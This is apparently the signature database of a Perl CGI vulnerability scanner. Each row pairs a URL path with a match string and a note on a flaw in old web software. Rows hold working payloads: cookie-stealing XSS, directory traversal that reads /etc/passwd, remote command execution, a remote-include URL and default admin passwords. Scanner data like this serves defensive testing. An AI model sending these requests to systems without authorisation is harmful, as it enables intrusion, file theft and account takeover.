scan_database.db

一个用perl写的功能强大的cgi漏洞检测程序

"generic","/addressbook/index.php?name=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/addressbook/index.php?surname=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;","<script>alert('Vulnerable')</script>","GET","phpLinkat is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/add_user.php","output started at /","GET","DCP-Portal reveals system path. Upgrade to a version higher than 4.2. This version is also vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/admin.html","MySimpleNews - Administration","GET","MySimpleNews contains the admin password in the login page HTML."," "
"generic","/admin.php4?reg_login=1","200","GET","Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected."
"generic","/admin.php?en_log_id=0&action=config","200","GET","EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This php file should be protected."
"generic","/admin.php?en_log_id=0&action=users","200","GET","EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This php file should be protected."
"generic","/Admin/","CobaltServer","GET","The web server is the CobaltRaq administrator. If password protection is broken, attackers will have access to admin your server. Use tcpwrappers or shut this down for safety."
"generic","/admin/admin.php?adminpy=1","200","GET","PY-Membres 4.2 may allow administrator access."
"generic","/admin/admin_phpinfo.php4","200","GET","Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected."
"generic","/admin/browse.asp?FilePath=c:\&Opt=2&level=0","winnt","GET","Hosting Controller from hostingcontroller.com allows any file on the system to be read remotely."
"generic","/admin/contextAdmin/contextAdmin.html","200","GET","Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin."
"generic","/admin/cplogfile.log","200","GET","DevBB 1.0 final (http://www.mybboard.com)  log file is readable remotely. Upgrade to the latest version."
"generic","/admin/database/wwForum.mdb","200","GET","Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein"
"generic","/admin/db.php","e107 sql-dump","POST","The e107 management system allows the remote SQL database to be dumped to the user, and it may contained hashed passwords. BID-8273.","dump_sql=foo"
"generic","/admin/exec.php3?cmd=cat%20/etc/passwd","root:","GET","DotBr 0.1 allows remote command execution."
"generic","/admin/exec.php3?cmd=dir%20c:\","boot.ini","GET","DotBr 0.1 allows remote command execution."
"generic","/admin/login.php?action=insert&username=test&password=test","200","GET","phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify."
"generic","/admin/login.php?path=\"></form><form name=a><input name=i value=XSS>&lt;script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","mcNews 1.1a from phpforums.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/admin/phpinfo.php","200","GET","Immobilier or phPay allows phpinfo() to be run. See http://www.frog-man.org/tutos/Immoblier.txt or http://phpay.sourceforge.net/"
"generic","/admin/system.php3?cmd=cat%20/etc/passwd","root:","GET","DotBr 0.1 allows remote command execution."
"generic","/admin/system.php3?cmd=dir%20c:\","boot.ini","GET","DotBr 0.1 allows remote command execution."
"generic","/admin/system_footer.php","200","GET","myphpnuke version 1.8.8_final_7 reveals detailed system information."
"generic","/administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>","GET","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>","GET","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/administrator/gallery/uploadimage.php","200","GET","Mambo PHP Portal/Server 4.0.12 BETA and below may allow upload of any file type simply putting '.jpg' before the real file extension."
"generic","/administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>","GET","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>","GET","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>","GET","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>","GET","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/Admin_files/order.log","200","GET","Selena Sol's WebStore 1.0 exposes order information, http://www.extropia.com/, http://www.mindsec.com/advisories/post2.txt."
"generic","/agentadmin.php","200","GET","Immobilier may allow php files to be included from remote sites. See http://www.frog-man.org/tutos/Immoblier.txt"
"generic","/akopia/","200","GET","Akopia is installed."
"generic","/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ CAN-2001-1212, CA-2000-02."
"generic","/albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd","root:","GET","Coppermine 1.0 RC3 may have been compromised to allow arbitrary file retreival. Upgrade to the latest at http://www.chezgreg.net/coppermine/"
"generic","/ans.pl?p=../../../../../usr/bin/id|&blah","uid","GET","Avenger's News System allows commands to be issued remotely.  http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@127.0.0.1', password file location 'ans_data/ans.passwd'"
"generic","/ans/ans.pl?p=../../../../../usr/bin/id|&blah","uid","GET","Avenger's News System allows commands to be issued remotely."
"generic","/anthill/login.php","200","GET","Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS/HTML injection and may allow users to bypass login requirements. http://anthill.vmlinuz.ca/ and CA-2000-02"
"generic","/apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/article.cfm?id=1'<script>alert(document.cookie);</script>","<script>alert(document.cookie);</script>","GET","With malformed URLS, Coldfusion is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/article.cfm?id=1'<script>alert(document.cookie);</script>","[SQL SERVER] Error Code","GET","Coldfusion may reveal SQL information in malformed requests."
"generic","/article.php?article=4965&post=1111111111","Unable to jump to row","GET","PHP FirstPost can reveal MySQL errors and file system paths if invalid posts are sent."
"generic","/article.php?sid=\"><Img Src=javascript:alert('Vulnerable')><Img Src=\"","<script>alert('Vulnerable')</script>","GET","phpWebSite 0.8.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/ASP/cart/database/metacart.mdb","200","GET","MetaCart2 is an ASP shopping cart. The database of customers is available via the web."," "
"generic","/atomicboard/index.php?location=../../../../../../../../../../etc/passwd","root:","GET","AtomicBoard v0.6.2 allows remote users to read arbitrary files."
"generic","/author.asp","200","GET","May be FactoSystem CMS, which could include SQL injection problems which could not be tested remotely."
"generic","/autohtml.php?op=modload&mainfile=x&name=/etc/passwd","root:","GET","php-proxima 6.0 and below allows arbitrary files to be retrieved."
"generic","/awebvisit.stat","200","GET","Just found this log file..."
"generic","/axis-cgi/buffer/command.cgi","200","GET","Axis WebCam 2400 may allow overwriting or creating files on the system. See http://www.websec.org/adv/axis2400.txt.html for details."
"generic","/a_security.htm","name=\"viewingpasswrd\" value=","GET","Polycom ViewStation FX Release v4.2 reveals the admin password in the change password form's HTML."
"generic","/b2-include/b2edit.showposts.php","200","GET","Some versions of B2 (cafelog.com) are vulnerable to remote inclusion by redefining $b2inc to a remote php file. Upgrade to a version higher than b2.06pre2. This vulnerability could not be confirmed."
"generic","/ban.bak","200","GET","Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected."
"generic","/ban.dat","200","GET","Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected."
"generic","/ban.log","200","GET","Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected."
"generic","/banmat.pwd","200","GET","Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected."
"generic","/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1","root:","GET","Remote file retrieval."
"generic","/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu","root:","GET","Remote file retrieval."
"generic","/bb-dnbd/faxsurvey","200","GET","This may allow arbitrary command execution."
"generic","/bb000001.pl<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","root:","GET","The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320."
"generic","/bc4j.html","Business Components","GET","Default Oracle page, may allow limited administration."
"generic","/bigconf.cgi","200","GET","BigIP Configuration CGI"
"generic","/billing/billing.apw","PASS BOX CAPTION:","GET","CoffeeCup password wizzard allows password files to be read remotely."
"generic","/blah-whatever-badfile.jsp","Script /","GET","The web server is configured to respond with the web server path when requesting a non-existent .jsp file."
"generic","/blah123.php","Failed opening ","GET","PHP is configured to give descriptive error messages which can reveal file system paths."
"generic","/blah_badfile.shtml","200","GET","Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->"
"generic","/bottom.html","Topaz Prism","GET","Topaz Prism appears to be running, try login with admin/admin."
"generic","/buddies.blt","200","GET","Buddy List?"
"generic","/buddy.blt","200","GET","Buddy List?"
"generic","/buddylist.blt","200","GET","Buddy List?"
"generic","/bytehoard/index.php?infolder=../../../../../../../../../../../etc/","passwd","GET","ByteHoard 0.7 is vulnerable to a directory traversal attack. Upgrade to version 0.71 or higher."
"generic","/c32web.exe/ChangeAdminPassword","200","GET","This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password."
"generic","/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini","[fonts]","GET","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076"
"generic","/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd","root:","GET","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076"
"generic","/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini","[windows]","GET","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076"
"generic","/ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f","<script>alert('Vulnerable')</script>","GET","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05","<script>alert(document.cookie);</script>","GET","DCP-Portal v5.3.1 is vulnerable to  Cross Site Scripting (XSS). CA-2000-02."
"generic","/cartcart.cgi","200","GET","If this is Dansie shopping cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands."
"generic","/catalog/includes/include_once.php","200","GET","This phpWebSite script may allow inclusion of remote scripts by adding ?inc_prefix=http://YOURHOST/"